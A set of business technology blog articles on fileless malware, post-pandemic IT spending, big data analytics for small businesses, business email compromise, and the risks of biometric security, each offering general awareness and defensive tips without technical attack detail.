Fileless Malware Poses New Threat to Computer Users

Fileless Malware Poses New Threat to Computer UsersWith increased cyber threats, there is great awareness of malware that comes attached in files.  Individuals and businesses invest in security solutions to protect against malware. In fact, there are often company policies regarding opening attachments on emails; yet there is an increase in a type of threat (though not new), known as the fileless malware.

What is Fileless Malware?

A fileless malware attack is a type of threat that doesn’t involve executable files. Instead, these attacks include scripts that run on browsers, command prompts, Windows PowerShell, Windows Management Instrumentation, VBScripts, or Linux (Python, PERL).

In other words, fileless malware is a form of cyberattack carried out through software that already exists on your device, in your authorized protocols and in applications that you have allowed on your device.

As such, fileless malware is becoming a favorite of cybercriminals because they don’t have to look for ways to install malicious files in your device – they only need to take advantage of built-in tools.

Reported examples of fileless malware include PowerGhost, which has been used in crypto-mining and DDoS attacks.

How It Works

First, note that these attacks are termed fileless because they are not file-based; instead, they hide in computer memory.

The malware launches an attack in various ways. For instance, a malicious code is injected in an application already installed or a user clicks on a legitimate-looking link that loads a remote script.

Another scenario exists within a legitimate-looking website that a user visits; the attackers exploit vulnerabilities in the Flash plugin; and a malicious code runs in the browser memory of the user’s computer.

While file-based malware uses executable files, the fileless type hides in areas where it can’t easily be detected, such as the memory. It is then written directly to the RAM (and not the disk), where it carries out a series of events.

Once in your system, the malware piggybacks on legitimate scripts and executes malicious activities while the legitimate program runs. At this point, it performs malicious activities such as payload delivery, escalating admin privileges, and reconnaissance, among others.

Since it works in-memory (RAM), its operations end when you reboot your system. This makes it more challenging to trace attacks. The fileless malware also may work in cohorts with other attack vectors, such as ransomware.

Detection and prevention

Various security vendors claim to have products that can detect fileless threats, as well as protect endpoint systems.

Successful security solutions need to be able to put in place technologies that enable them to inspect different kinds of operating systems storage, as well as analyze in real-time the execution of patterns of processes in a system.

But even so, one thing is certain: traditional anti-malware software will not detect fileless malware because they are not file-based and they do not they leave footprints. Here are some tips that will help mitigate against fileless attacks:

  • Regularly update the software on your devices (especially Microsoft applications) to protect against attacks propagated through PowerShell.
  • Apply an integrated approach that addresses the entire full threat lifecycle. This is possible when you use a multilayered defense mechanism.  
  • Use security solutions that can detect malicious attacks against command prompt (CMD), PowerShell, and whitelisted application scripts.
  • Use anti-malware tools that include machine learning, as this will limit scripts from creating new polymorphic malware within your environment.
  • Practice behavior monitoring to help lookout for unusual patterns.
  • Use memory scanning to help detect patterns of known threats.
  • Be on the lookout for high CPU usage by legitimate processes and suspicious error messages that appear for no clear reason.
  • Disable PowerShell and Windows Management Instrumentation (WMI) if you are not utilizing them.
  • Avoid using macros that have no digital signatures or turn off macros if not being used.
  • Use endpoint detection and response tools.

Final Thoughts

The cyber threat landscape keeps evolving. Every day, there are more sophisticated threats as criminals keep advancing to take on countermeasures that have been implemented.

Invest in security solutions that mitigate varying classes of threats, especially machine learning technologies. This will help protect against the latest and emerging threats. Also, keep your Windows OS and other installed software up-to-date to reduce the chances of fileless malware attacks.

Despite taking the mentioned measures, it’s important to stay informed of the latest threats and take necessary precautions.

How IT Spending Will Change When Business Resumes

Most states are starting to relax stay-at-home restrictions. As such, businesses are developing plans for bringing employees back to work. Many businesses are already affected by the pandemic and their future looks grim. Specifically, we are going to look at the IT sector and examine what spending might look like in a post-lockdown economy.

Disruption

The COVID-19 pandemic has resulted in an unprecedented disruption in businesses. As a result, management has tried to reduce costs to survive or risk shutting down. IT departments have suffered the most with major budget cuts due to a reduction in revenue. As a result, non-urgent purchases have been eliminated; initiatives have been suspended; and employees have been terminated.

Of course, technology also has been playing a great role in supporting businesses during the pandemic, especially by enabling work at home and keeping in touch with clients. But there are expectations for major challenges when businesses get back to normal. For instance, the post-coronavirus business world expects travel restrictions, office distancing, business continuity, and pandemic regulations. As for onsite work in the office, challenges will include distributed collaboration, endpoint data protection, scalable administration, and secure access to corporate data.

It also appears that the impact will vary from industry to industry. Companies that depend on face-to-face contact are in danger of lost income and bankruptcy. At the same time, other businesses are thriving.

Consider digital marketing industries. With more businesses moving online, there will be a rise in the purchase of IT-related expenditures such as software. The entertainment sector has found solace in digital platforms, while there is an increase in the work-at-home trend.

The Future

Despite the uncertainties, some predictions can be made.

One thing that is certain is that the impact on IT spending will vary depending on the IT stack. While the infrastructure, branch networking, middleware, and enterprise apps might see a drop, areas such as communication/collaboration, cloud storage, security, and compliance will likely see an increase in spending as more people work remotely.

While the impact on the IT industry will definitely vary, we could see a lot of new innovations. Such innovations might include customer-facing and worker productivity apps. Some companies may increase spending on new innovations to help outperform their competition.

Another factor affecting IT spending is the size of a business. While big businesses may get back to normal after a few months, small businesses have to tread carefully. As such, IT spending for different-sized businesses will not be similar.

A decision to have employees continue working at home means that IT expenditures will take a different shape. While there will be less need for office equipment, there will be an increase in spending to enable offsite work.

There could also be more spending by businesses investing in continuity strategies such as more remote locations, new training in information and communications technology (ICT) and automation of processes.

This also will depend on business operations. Consider a business that had already migrated to the cloud before the COVID-19 pandemic. Such businesses did not suffer much disruption compared to those still using on-premise applications and proprietary data centers. Thus, IT spending for both types of businesses will vary in the future.

Lastly, businesses will want to invest in projects that are likely to provide a return on investment faster.

Conclusion

The disruption to businesses by the COVID-19 pandemic is like none previously encountered. One thing is certain: Things will not bounce back to the known normal. Rather, we should expect a new normal. And, as we have seen through the examination of certain IT expenditures, the success of each industry is dependent on various factors.

How Businesses Benefit from Big Data Analytics

Previously we looked at the key technology trends in accounting to watch out for in 2020. Among the trends are big data and data analytics, which can have a great impact on businesses.

Business data has existed for a long time, whether in filing cabinets, ledgers or storage devices. But today businesses both large and small have to deal with huge collections of data every day. This has seen the rise of data analytics trends that include deep learning, machine learning and dark data.

Unfortunately, small and medium businesses (SMB) have to struggle with making a decision on implementing data analytics. This is largely because many SMB owners assume that data analytics is strictly for large organizations – especially because of the expectation that it’s expensive and complicated.

Luckily, reduced tech costs have made it possible for small and medium businesses to afford technologies that were previously only cost-effective for big organizations.

Is the Cost and Effort Worth It? 

Before the advent of big data analytics, customer data was collected using surveys or customer feedback forms. Analyzing such data is tedious, and it’s possible to miss out on important trends.

Also, imagine running marketing campaigns and having no way to track how effective the campaign was. If you do this in your business, you have no way to know who saw the ad or even the response.

Enter big data and analytics and the whole marketing landscape changes. With big data, a business has clear insights about customer behavior. This is possible because we now can track visitors to a website, the time a visitor spends on a given page, action taken such as making an order, the location the purchase came from and so many other details that help a business refine its marketing strategy.

Is it costly? You’d be surprised to know that you don’t need to purchase expensive software. You’ll find, for instance, that you can take advantage of data collected by the QuickBooks accounting software. And depending on your business needs, the software can be connected with low-cost platforms that enable more detailed analytics.

You also can get free platforms such as Google Analytics to analyze website traffic and gain insight into consumer behavior. Whatever your company size, you can take advantage of big data insights to better understand your customers.

Here are some reasons why it’s worth it:

  • Analytics help to launch effective marketing campaigns that result in better ROI.
  • Analytics help to track the customers in their sales cycle.
  • It’s possible to track the outcome of business decisions, such as promotional strategies.
  • You get to know which suppliers or other business partners to work with.
  • Provides insights on customers who are likely to pay on time based on historical payment data.
  • Improves customer service. This is possible when customer conversations from different channels are analyzed.
  • It helps to improve the product or service offered by a business.  
  • Identifies trends and patterns. For instance, you can track frequently asked questions and then create a page to handle the common questions.
  • Helps create a strong bond with customers. By understanding customer interests, a business will then engage with their customers by creating personalized offers and campaigns.
  • On the tech side, big data is being used to detect and prevent fraud.  
  • Analytics identify problematic areas of a business, and this makes it easier to come up with a response quickly before the problem escalates.

Become Smarter

When used correctly, data analytics can help a business gain a competitive advantage over other businesses. At the same time, it will also boost your business conversions and revenue. But collecting just any piece of data can be overwhelming and even a waste of time. The secret is in collecting data that will help you reduce business costs and increase your revenue.

How to Stay Safe with Business Email Compromise on the Rise

According to a report by the Financial Crimes Enforcement Network (FinCEN) released in July, financial institutions have incurred more than $9 billion in losses due to Business Email Compromise (BEC) schemes since 2016. With such staggering losses, businesses and even individuals can’t afford to ignore BEC attacks.

What is BEC?

BEC fraud involves cyber thieves posing as company executives or a business contact with the intention to commit wire transfer fraud or obtain sensitive information. The main targets are businesses working with foreign suppliers or a business that carries out regular wire-transfer payments.

To carry out this attack, criminals might pretend to be the company CEO and request that a junior staff member perform a task for them, such as transferring funds. Attackers take advantage of the fact that most organizations don’t have a set procedure to verify instructions received from the top management.

How Attackers Collect Data from their Targets

Cyber criminals use various techniques to carry out BEC fraud, with the main aim of stealing funds from the victims. The techniques used include:

  • Imposter techniques – this can be carried out in various ways. Attackers use a look-alike domain, display-name deception and spoofed emails that appear to come from legitimate addresses.
  • Social engineering – when a target has not set appropriate privacy settings on social media accounts, an attacker can easily collect information that will make their requests sound legitimate.
  • Malware – this enables attackers to have access to sensitive information that makes the fake request sound legitimate.
  • Mining from the Dark Web – here attackers can obtain stolen credentials.

How to Avoid BEC Attacks

It is difficult for conventional security systems to detect BEC schemes. Consider a case in which a transaction is initiated willingly by a legitimate user in response to a request from a legitimate source. Such an email has no payloads such as malicious attachments that can be blocked.

Here are some methods to help reduce the possibility of these attacks:

  • Raising awareness of common attack scenarios or tactics used by the cyber criminals, such as a false domain name that looks almost like the original one, impersonation of a vendor, false sense of urgency or a request for secrecy.
  • Training employees on cyber security risks and implications.
  • Implementing email authentication protocols like Domain-Based Message  Authentication, Reporting and Conformance (DMARC) and email authentication, such as DomainKeys Identified Mail (DKIM).
  • Using layered defense, such as encryption, and virtual private networks.
  • Implementing a multifactor authentication that will introduce a secondary authorization control. This will help stop attackers even when they have access to the target’s credentials.
  • Establishing communication protocols that will allow for a follow-up. For instance, if the person is requesting financial transactions, an employee should call to ascertain the request.
  • Scrutinizing all emails that request for fund transfer.
  • Monitoring incoming email, especially those that use VIP names.
  • Optimizing accounting systems and controls.

Final Thoughts

Apart from taking precautionary measures, businesses also should make sure that their insurance specifically covers BEC attacks, as courts might have different interpretations of policies. Consider the case of Apache Corporation, which lost $7million due to a BEC attack. The judge ruled that since the money was sent to pay a legitimate invoice to the wrong bank, it was not covered by their insurance policy.

Note that a majority of these criminals are from countries that might not have strict laws on cybercrime, making it difficult to have them prosecuted.

So, whether you run a small, medium or large business, or even a personal account, it’s vital that you take precautionary measures against the increasing BEC schemes.

The Rise of Biometrics Security and Why You Should Take Precaution

Biometric technology has been on the rise as it promises to make the authentication process more secure and convenient. Unlike passwords and key cards, biometrics are something you will always have, can’t share and can’t forget. This makes the biometric approach convenient and at the same time it has lower password management costs.

Biometrics also are said to be difficult to steal or hack; difficult, but not impossible.

Any technology can have loopholes that can be exploited, and that’s why you need to understand it well and take precautions if you decide to use this approach.

The use of biometrics is not new, but its increased presence in the public domain such as banks makes it a topic of interest.

To help us understand the need to tread carefully, let’s first have a peek at the latest biometric security technologies.

New Trends in Biometric Security

Biometric authentication is becoming popular for digital payments, logging in to banking systems and even on smartphones. New trends in biometrics security include:

  • Voice recognition: the human voice is used to create voice prints to be used for user authentication in a voice ID system. 
  • Face recognition: 3D face recognition is another new development that uses sensors to identify the shape of a person’s face. This is done by using facial characteristics such as the nose, cheeks, chin and contours of the eye sockets. 
  • Mobile biometric technology: mobile devices also have joined the bandwagon, and manufacturers are now fitting them with biometric sensors. It is also possible to attach portable biometric-sensing equipment using a USB cable.
  • Biometrics on the cloud: cloud-based solutions have been developed to speed up the identification process. Since users don’t have to spend so much on necessary applications, hardware and infrastructure, this becomes cost effective.

How Secure is the Biometric Approach?

Biometric security is increasingly being used as a preference to passwords, but how safe is this approach? Fingerprints may not be as secure as they are said to be. Consider this, some researchers were actually able to generate fake fingerprints that they called DeepMasterPrints. These fingerprints were generated using a neural network technique to create artificial fingerprints that can work as a “master key.” This goes to show how a system using fingerprints for security can be vulnerable to dictionary attacks using the created MasterPrints.  

There are many people posting their pictures online on social media. Unfortunately, once you do that your images are no longer private. This means that a face can easily be captured from the internet.

Retina scans are considered extremely reliable and accurate more than the iris scan. However, it is the least common as it’s considered to be intrusive.  

Reservations

The use of biometrics is a great development toward security concerns, but it raises privacy issues. Keep in mind that biometric information can easily be harvested – from a distance and without your knowledge. The cloud also is another reason to be concerned. Although biometrics are effective in enforcing security, the data collected has to be stored somewhere. How secure are the databases that store this information? Of course, this increases the possibilities of a breach.

Some reports made public include a potential hack for the palm vein scanner and a claim by a research team at vpnMentor about a leak of millions of fingerprints from BioStar 2, an app built by Suprema. Whether this and other similar claims are true or not, it just goes to show how vulnerable biometrics data can be. It also won’t be long before marketplaces emerge on the Dark Web for actual biometrics.

Remember that unlike passwords, you can’t change your biometrics. If someone had access to a biometrics database, then they would have access to sensitive data.

Another reservation involves the right to privacy for your biometrics. It’s possible for your biometrics to be collected without your informed consent. For instance, in stores where face recognition is used to identify potential shoplifters or to survey shoppers’ behavior. Recently, the FaceApp Challenge created by a Russian company had its share of controversy. Although said to be purely for entertainment, it also means that no one has control over what the company collecting the data will do with it. 

Businesses face the potential risk of getting sued by their own employees. This is because there are some locations that already have a biometric privacy act law. In the United States, the Illinois Biometric Information Privacy Act (BIPA) allows users to sue under this law to protect their privacy.

Stay Safe

Since cyber criminals are always working on hacking new security systems, it’s crucial that users of these systems remain cautious. One of the ways to stay safe when using biometrics is the use of multi-modal authentication, which requires input from more than one biometric device. This will help overcome some loopholes, such as the use of copied fingerprints or stolen voice and facial prints.

Luckily, with advances in artificial intelligence and machine learning, biometrics can be enhanced. Users can be scrutinized using their online behavior. Since people tend to be creatures of habit, a behavior-based system can develop a more complex user profile. The tracked behavior will help to tell a genuine user from a potential threat.

Since it’s difficult to know if your biometrics have been stolen, it’s best to take precautionary measures that could include:

  • Avoiding unnecessarily sharing personal information, such as the bank account numbers, date of birth or Social Security number
  • Paying close attention to your bills and financial statements
  • Watching out for unauthorized transactions by reviewing your credit card and bank statements.
  • Using other security features on your mobile device.
  • Avoiding using public WiFi. It is also important that you keep your sharing and firewall settings updated.

In Conclusion

The biometric authentication is not a silver bullet. Technically, biometrics are not secret and have similar cyber risks as passwords, only they are exploited differently. Whenever a new technology becomes pervasive, there are individuals who will definitely try to figure it out –especially because these technologies are used to access financial services and private data.

In the digital world, we cannot assume complete security. The best you can do is work with known credible vendors and stick with providers who comply with both federal and state data privacy regulations. Lastly, use technologies that are tried and tested.